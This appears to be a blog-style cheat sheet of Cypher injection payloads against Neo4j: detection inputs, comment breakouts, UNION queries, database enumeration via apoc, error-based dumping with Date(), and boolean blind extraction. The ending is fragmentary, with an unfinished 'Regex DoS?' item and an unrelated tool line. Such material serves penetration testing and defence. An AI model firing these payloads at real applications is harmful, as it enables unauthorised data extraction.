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Neo4j (Cypher graph query language) injection

I recently came across an injection issue in an app using the Neo4j database for storage. As I had not come across this before and there doesn’t seem to be many posts covering this I thought I would compile a list of syntax that can accomplish most of the common tasks when exploiting query based injection. I used the free sandbox from Neo4j to test these: https://sandbox.neo4j.com/

A simple query should look something like this:

MATCH (a:Movie {title: 'Johnny Mnemonic'}) RETURN a


MATCH (a:Movie) WHERE a.title = "Johnny Mnemonic" RETURN a




MATCH (a:Movie) RETURN a ORDER BY title


Detection of a vulnerable Neo4j query is mostly similar to detecting SQL injection, try using any of the following payloads in the example queries above:

  • "
  • )
  • int-int (ie: 12-1)
  • int/0 (ie: 12/0)
  • prepend a string like zxlck.

Payload Johnny 'Mnemonic:

MATCH (a:Movie {title: 'Johnny 'Mnemonic'})

Yields the following:

Invalid input 'Mnemonic': expected
(line 1, column 33 (offset: 32))
"MATCH (a:Movie {title: 'Johnny 'Mnemonic'})"


We can inject the necesary characters to form valid syntax '})and then comment out the rest with //. Payload Johnny '}) // yields no error or matches:

MATCH (a:Movie {title: 'Johnny '}) //Mnemonic'})

List tables:

match(a) return distinct labels(a)


MATCH (n:Movie) where n.title = "abc injectect" return 123 as b union match (a) return distinct labels(a) as b //

Select databases:

CALL apoc.systemdb.execute('SHOW DATABASES') YIELD row RETURN row.name as dbName;

seems injectable:

match (a) where 1 < 2 CALL apoc.systemdb.execute('SHOW DATABASES') YIELD row RETURN row.name as dbName;

match (a) where "a" = "b" return "a" as dbName union CALL apoc.systemdb.execute('SHOW DATABASES') YIELD row RETURN row.name as dbName limit 1;

match (a) where "a" = "b" return "a" as dbName union CALL apoc.systemdb.execute('SHOW DATABASES') YIELD row RETURN date(row.name) as dbName skip 2 limit 1;


Like other database injection techniques we can also do union:

MATCH (n:Movie) RETURN n LIMIT 25 union all match (b:sysinfo) return b

With union both sides must match, which can be solved by inject a fixed return before the union:

match (b:Person) where b.name = '' return size("123") as test union match (a:Movie) return size(keys(a)[2]) as test limit 1

Error based injection

If error messages are enabled, most data can simply be dumped out by placing it inside the Date() function as it will fail to convert it to a date and error out the argument it received instead:

MATCH (a:Movie)
RETURN a ORDER BY a.title,Date(keys(a))

Blind exploitation

Neo4j does not have a time/sleep function, but we can still perform boolean blind injections Number of columns:

match (a) return size(keys(a)) limit 1

Length of column:

match (a) where a.title = '' or 4 = size('1234') return a limit 1

Length of first column:

match (a) return size(keys(a)[0]) limit 1

Length of table name:

match (b:Person) where b.name = '' return size("123") as test union match (a) return size(keys(a)) as test limit 1

If condition:

match (a:Movie) return a order by case 'a' when 'b' then a.title else a.name end


match (a) where a.title = 'injected' return 1 as test union match (b:Person) return substring(keys(b)[0],0,1) as test//'

Putting it together:

match (a) where a.title = 'injected' return 1 as test union match (b:Person) return case substring(keys(b)[0],0,1) when "a" then 2 else 3 end as test//'

match (a) where a.title = 'injected' return 1 as test union match (b:Person) return case substring(keys(b)[0],0,1) when "n" then 2 else 3 end as test//'

match (a) where a.title = 'injected' return 1 as test union match (b:Person) return case size(keys(b)[0]) when 1 then 2 else 3 end as test//'

match (a) where a.title = 'injected' return 1 as test union match (b:Person) return case size(keys(b)[0]) when 4 then 2 else 3 end as test//'


This appears to be the best documented technique, I didn’t spot any easy way to exfil data or environment variables and it does not appear to relay NTLM, but I didn’t investigate that deeply.

LOAD CSV FROM 'https://domain/file.csv' AS line
CREATE (:Artist {name: line[1], year: toInteger(line[2])})

Regex DoS?

Bonus issue, it may or may not work:

RETURN "pwnt"


Static source code analysis tool for finding vulnerabilities in source code.


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